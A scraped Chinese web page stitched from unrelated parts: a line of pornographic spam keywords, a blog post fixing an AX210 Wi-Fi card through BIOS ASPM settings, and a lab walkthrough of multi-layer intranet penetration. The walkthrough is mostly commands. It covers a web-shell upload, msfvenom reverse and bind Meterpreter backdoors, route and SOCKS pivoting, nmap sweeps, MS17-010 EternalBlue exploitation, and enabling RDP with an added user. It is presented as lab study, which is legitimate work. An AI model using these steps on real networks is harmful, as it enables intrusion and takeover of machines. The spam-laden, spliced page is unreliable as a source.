欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊

    下經(jīng)過:家里電腦搬到另一個(gè)臥室,距離客廳的主路由器有點(diǎn)兒遠(yuǎn),中間隔道墻,臥室以前沒接網(wǎng)線,所以就想試下無線上網(wǎng),試過USB的無線網(wǎng)卡,信號(hào)實(shí)在是差,還會(huì)經(jīng)常斷線。想著弄著臺(tái)式機(jī)的無線網(wǎng)卡信號(hào)會(huì)好一些,上網(wǎng)看中了AX210,折騰開始,這網(wǎng)卡是通過轉(zhuǎn)換卡來實(shí)現(xiàn)臺(tái)式機(jī)無線上網(wǎng)的,你拆下來甚至還能給筆記本用。

    買后興沖沖的安裝到一個(gè)PCIEx1插槽中,另外還按要求連接了一個(gè)USB9針口。

    問題表現(xiàn)

    在intel官網(wǎng)下載了最新的win11下的AX210驅(qū)動(dòng),參考以下網(wǎng)址:

    https://www.intel.cn/content/www/cn/zh/products/sku/204836/intel-wifi-6e-ax210-gig/downloads.html

    網(wǎng)卡、藍(lán)牙驅(qū)動(dòng)安裝完成后,網(wǎng)卡頭一回露了個(gè)黃臉,但是有問題,說設(shè)備無法啟動(dòng)(代碼10),設(shè)備不存在。你不存在還顯示個(gè)啥呢?

    但在電腦重啟之后,網(wǎng)卡干脆再不出現(xiàn)了。藍(lán)牙倒是OK,我還專門試了下,正常連接了藍(lán)牙耳機(jī)播放!也就說,AX210安裝后只有藍(lán)牙設(shè)備!這商家不會(huì)坑我吧?但看網(wǎng)卡確實(shí)是很新,不像二手貨。

    和店家聯(lián)系之后,讓換插槽試驗(yàn),但無論我如何換到哪個(gè)PCI槽,都是只有藍(lán)牙,AX210顯卡消失無影。讓我看bios設(shè)置,全部的PCIE正常,USB設(shè)置打開,老板也沒門了。

    PCIE全部打開

    我這主板有5個(gè)PCIE,全部開著,而且都是自動(dòng)。我把全部插槽都試了一遍!

    USB全部啟用

    網(wǎng)絡(luò)上搜索辦法,都沒有更好的應(yīng)對(duì),我這機(jī)器的配置是華擎Asrock z390 pro4+i5 9600K,按說AX210是支持的,不存在說Ax211這種還需要10代CPU以上才行。

    得,換臺(tái)Win10試下吧,可能是Windows11支持不太好?(但感覺網(wǎng)上驅(qū)動(dòng)是直接從intel官網(wǎng)下載的,還明確說明了是支持Win11)


    Windows10更折騰,首先也是顯示出黃色的網(wǎng)卡,與Windows11有所區(qū)別,這回給你來個(gè)

    Windows仍在設(shè)置此設(shè)備的類配置(代碼56)。

    安裝驅(qū)動(dòng)試下,結(jié)果無法安裝了...

    一番搜索,得知,網(wǎng)卡驅(qū)動(dòng)可能會(huì)和vmware沖突,果斷卸載vmware網(wǎng)上后驅(qū)動(dòng)是能夠安裝了,但問題依舊!還是代碼56,頭大!這AX210網(wǎng)卡這么嬌貴的么?還不能有其它網(wǎng)卡?

    實(shí)在沒轍了,準(zhǔn)備拆卡返還商家,腦海中突然閃現(xiàn)出過去經(jīng)常用的硬件沖突解決辦法:載入bios默認(rèn)設(shè)置!

    好,網(wǎng)卡換回win11系統(tǒng),進(jìn)入bios, 載入U(xiǎn)EFI default,即bios的缺省設(shè)置

    電腦一通重啟,啊哈,一切正常。

    網(wǎng)速也還行,我家還是100M寬帶,見笑。


    解決是解決了,但到底是哪個(gè)bios配置在影響無線網(wǎng)卡的正常驅(qū)動(dòng)呢?研究之后,發(fā)現(xiàn)是下面這幾項(xiàng)影響了AX210的正常驅(qū)動(dòng):

    PCIE ASPM Support

    PCH PCIE ASPM Support

    DMI ASPM Support

    PCH DMI ASPM Support

    問題分析

    ASPM是個(gè)啥鬼?ASPM,主動(dòng)狀態(tài)電源管理Active State Power Management。看了一堆資料,這設(shè)置能夠降低PCIE的功耗,個(gè)人理解,讓電腦自動(dòng)管理PCIE中的電能,可能會(huì)造成PCIE插槽供電問題,畢竟這款 AX210是通過轉(zhuǎn)接卡來使用的,可能就沒有啥電源管理,所以未能正常工作,解決辦法就是關(guān)掉自動(dòng)化的電源管理,讓PCIE一直工作,則一切正常!要說影響,可能就是會(huì)影響到NVME固態(tài)硬盤的溫度!咱家用電腦的,也不會(huì)工作太久,畢竟固態(tài)硬盤也是有散熱裝備的,也希望硬件大神們能有更詳細(xì)的解釋。

    如果你也遇到過無線網(wǎng)卡類似的毛病,那么思路就應(yīng)該放在pcie的電源管理上,而最終實(shí)在沒辦法的解決方案就是:

    載入bios缺省設(shè)置

    我是@愛玩的安哥,關(guān)注我獲取更多有用知識(shí)

    內(nèi)網(wǎng)

      • 前言
      • 1.實(shí)驗(yàn)簡介
        • 網(wǎng)絡(luò)拓?fù)鋱D
      • 2.環(huán)境搭建
        • 第一層網(wǎng)絡(luò)
        • 第二層網(wǎng)絡(luò)
        • 第三層網(wǎng)絡(luò)
      • 最后
        • 第一臺(tái)Linux
        • 第二臺(tái)Linux
      • 3.實(shí)驗(yàn)過程
        • 第一層靶機(jī)
        • 蟻劍連接
        • 進(jìn)一步做內(nèi)網(wǎng)滲透,上傳msf后門
        • 生成一個(gè)名為mshell.elf的msf后門文件
        • 蟻劍把后門文件上傳到Linux靶機(jī)
        • 返回msf 開啟監(jiān)聽
        • Kail接受到MSF會(huì)話
        • 添加路由
        • 使用MSF建立socks代理
        • 第二層網(wǎng)絡(luò)
      • 第三層網(wǎng)絡(luò)
        • 添加路由
        • Win10遠(yuǎn)程桌面連接
        • 登陸成功

    前言


    近年來,攻擊者潛伏在企業(yè)內(nèi)網(wǎng)進(jìn)行攻擊的安全事件屢見不鮮,攻擊者在經(jīng)常會(huì)企業(yè)的內(nèi)網(wǎng)進(jìn)行橫向滲透,令防守方防不勝防。因此,我們應(yīng)該嚴(yán)格控制好網(wǎng)絡(luò)區(qū)域之間的訪問規(guī)則,加大攻擊橫向滲透的阻力。本文由錦行科技的安全研究團(tuán)隊(duì)提供,旨在通過實(shí)驗(yàn)演示進(jìn)一步了解攻擊者是如何在多層內(nèi)網(wǎng)進(jìn)行的滲透。

    沒有耐心看完的看這里:

    網(wǎng)絡(luò)安全是一門大學(xué)問,要想理解透徹還得一步一步來,對(duì)此,我整理了一份小白走向滲透的知識(shí)總結(jié),還有視頻素材,可以對(duì)比著學(xué)習(xí)


    需要的關(guān)注我:私信回復(fù)“資料”獲取更多滲透測試、網(wǎng)絡(luò)安全資料

    1.實(shí)驗(yàn)簡介

    網(wǎng)絡(luò)拓?fù)鋱D

    滲透機(jī):win10+kali

    第一層靶機(jī) (外網(wǎng)web服務(wù)器): Linux

    第二場靶機(jī) (內(nèi)網(wǎng)web服務(wù)器): Linux

    第三層靶機(jī) (內(nèi)網(wǎng)辦公機(jī)) : win7

    用三層網(wǎng)絡(luò)來模擬內(nèi)外網(wǎng)環(huán)境,主要了解MSF、內(nèi)網(wǎng)轉(zhuǎn)發(fā)等。

    2.環(huán)境搭建

    第一層網(wǎng)絡(luò)

    把滲透機(jī)kali和win10網(wǎng)卡1設(shè)置選擇VMnet1:


    靶機(jī)Linux網(wǎng)卡1設(shè)置選擇VMnet1,添加網(wǎng)卡2 設(shè)置選擇VMnet2:

    第二層網(wǎng)絡(luò)

    將第二臺(tái)靶機(jī)Linux網(wǎng)卡1設(shè)置選擇VMnet2,添加網(wǎng)卡2 設(shè)置選擇VMnet3:

    第三層網(wǎng)絡(luò)

    將靶機(jī)win7網(wǎng)卡1設(shè)置選擇VMnet3:

    再配置好各臺(tái)機(jī)器對(duì)應(yīng)IP即可。

    最后

    在第一臺(tái)Linux和第二臺(tái)Linux上搭建一個(gè)php上傳頁面,設(shè)為存在文件上傳漏洞的web頁面,以便后續(xù)的拿shell進(jìn)行內(nèi)網(wǎng)滲透。

    第一臺(tái)Linux

    第二臺(tái)Linux

    3.實(shí)驗(yàn)過程

    第一層靶機(jī)

    win10訪問http://192.168.85.131/直接上傳一句話木馬

    蟻劍連接


    進(jìn)一步做內(nèi)網(wǎng)滲透,上傳msf后門

    打開kali msfconsole 輸入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

    生成一個(gè)名為mshell.elf的msf后門文件

    蟻劍把后門文件上傳到Linux靶機(jī)

    返回msf 開啟監(jiān)聽

    use exploit/multi/handler 使用監(jiān)聽模塊
    set payload linux/x64/meterpreter/reverse_tcp 使用和木馬相同的payload
    set lhost 192.168.85.128 kaili 的ip
    set lport 4444 木馬的端口
    run 執(zhí)行


    蟻劍打開虛擬終端cd到后門文件的目錄下,執(zhí)行后門文件,輸入

    chmod 777 mshell.elf 加執(zhí)行權(quán)限
    ./mshell.elf 執(zhí)行文件

    Kail接受到MSF會(huì)話

    輸入ifconfig,發(fā)現(xiàn)第二層172.10.10.0/24網(wǎng)段

    添加路由

    background 將會(huì)話轉(zhuǎn)到后臺(tái)
    route add 172.10.10.0/24 1
    添加 172.10.10.0/24網(wǎng)段 使用session1
    route print 查看路由表

    使用MSF建立socks代理

    use auxiliary/server/socks4a
    set srvhost 192.168.85.128
    set srvport 10080
    run

    配置socks4代理的相關(guān)客戶端Proxychains
    在配置文件/etc/proxychains.conf中添加:
    socks4 192.168.85.128 10080
    vi /etc/proxychains.conf

    添加socks4 192.168.85.128 10080

    這樣利用proxychains啟動(dòng)的應(yīng)用都可以帶sock4代理,proxychains 為kali自帶的,非MSF里的。

    建立好代理后滲透機(jī)可以通過這臺(tái)Linux當(dāng)跳板機(jī)進(jìn)入第二層網(wǎng)絡(luò)

    第二層網(wǎng)絡(luò)

    nmap探測存在web服務(wù)的主機(jī)

    用proxychans啟動(dòng)nmap對(duì)第二層網(wǎng)段進(jìn)行80端口掃描,執(zhí)行proxychains nmap -sT -Pn -p 80 172.10.10.0/24

    掃描發(fā)現(xiàn)55和56存在web服務(wù),172.10.10.56即為第二層網(wǎng)絡(luò)的ip

    由于proxychains無法代理icmp的數(shù)據(jù)包,所以必須添加-sT -Pn參數(shù),即不檢測主機(jī)是否存活,直接進(jìn)行端口tcp掃描。

    腳本探測存活主機(jī)

    在本地創(chuàng)建一個(gè)名為ping.sh的腳本,腳本內(nèi)容如下:

    #!/bin/bash
    ip=”172.10.10.”
    echo “ping log:” > ./ping.txt
    for i in {1..254}
    do
    ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
    done
    echo “wait 5s….”
    sleep 5
    cat ./ping.txt
    cat ./ping.txt | wc -l
    

    Kali進(jìn)入session1會(huì)話,然后upload命令上傳剛剛創(chuàng)建的腳本到靶機(jī)upload /root/ping.sh /var/www/hrml/upload

    進(jìn)入shell執(zhí)行

    python -c ‘import pty;pty.spawn(“/bin/bash”)’

    創(chuàng)建一個(gè)完全交互式shell,后

    Chmod 777 ping.sh
    ./ping.sh

    可以看到172.10.10.0/24網(wǎng)段存活56.57兩臺(tái)

    知道存活主機(jī)ip后就可以繼續(xù)進(jìn)入第二層內(nèi)網(wǎng)主機(jī)

    滲透機(jī)瀏覽器配置sock4a代理

    蟻劍加代理連接

    連接 http://172.10.10.56/upload/php1.php

    進(jìn)一步做內(nèi)網(wǎng)滲透,繼續(xù)上傳msf后門

    制作MSF后門

    返回kali msf 輸入

    msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

    生成 mshell1.elf后門文件

    因?yàn)樵趦?nèi)網(wǎng)跨網(wǎng)段時(shí)無法反向代理連接到滲透的機(jī)器,所以這里使用linux/x64/meterpreter/bind_tcp 這個(gè)payload進(jìn)行正向代理連接。
    蟻劍上傳后門

    蟻劍打開虛擬終端執(zhí)行后門文件


    返回會(huì)話

    輸入ifconfig 發(fā)現(xiàn)第三層網(wǎng)絡(luò)的網(wǎng)段10.10.10.0/24

    第三層網(wǎng)絡(luò)

    添加路由

    background
    route add 10.10.10.0/24 2
    route print

    進(jìn)入session 2 上傳 腳本 探測存活主機(jī)
    注意把腳本的ip段修改成該網(wǎng)段再上傳

    探測到第三層網(wǎng)段的存活ip :10.10.10.101

    proxychans 啟動(dòng)nmap對(duì)10.10.10.101的1-500端口掃描,執(zhí)行
    proxychains nmap -sT -Pn -p 1-500 10.10.10.101

    發(fā)現(xiàn)445端口開啟

    嘗試使用ms17-010
    use windows/smb/ms17_010_eternalblue
    set rhost 10.10.10.101
    set payload windows/x64/meterpreter/bind_tcp
    set lport 4466

    Run ,存在445漏洞

    執(zhí)行成功,返回會(huì)話

    開啟3389遠(yuǎn)程桌面

    run post/windows/manage/enable_rdp 開啟遠(yuǎn)程桌面
    run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加遠(yuǎn)程用戶

    將3389端口轉(zhuǎn)回kali本地5555端口
    portfwd add -l 5555 -p 3389 -r 10.10.10.101

    Win10遠(yuǎn)程桌面連接

    登陸成功

    網(wǎng)絡(luò)安全是一門大學(xué)問,要想理解透徹還得一步一步來,對(duì)此,我整理了一份小白走向滲透的知識(shí)總結(jié),還有視頻素材,可以對(duì)比著學(xué)習(xí),大家下載就行

    關(guān)注我、私信回復(fù)“資料”獲取更多滲透測試、網(wǎng)絡(luò)安全資料

    好了,大概內(nèi)網(wǎng)滲透流程就是這樣子,喜歡本文的轉(zhuǎn)發(fā)關(guān)注我~

網(wǎng)站首頁   |    關(guān)于我們   |    公司新聞   |    產(chǎn)品方案   |    用戶案例   |    售后服務(wù)   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區(qū)    電話:010-     郵箱:@126.com

備案號(hào):冀ICP備2024067069號(hào)-3 北京科技有限公司版權(quán)所有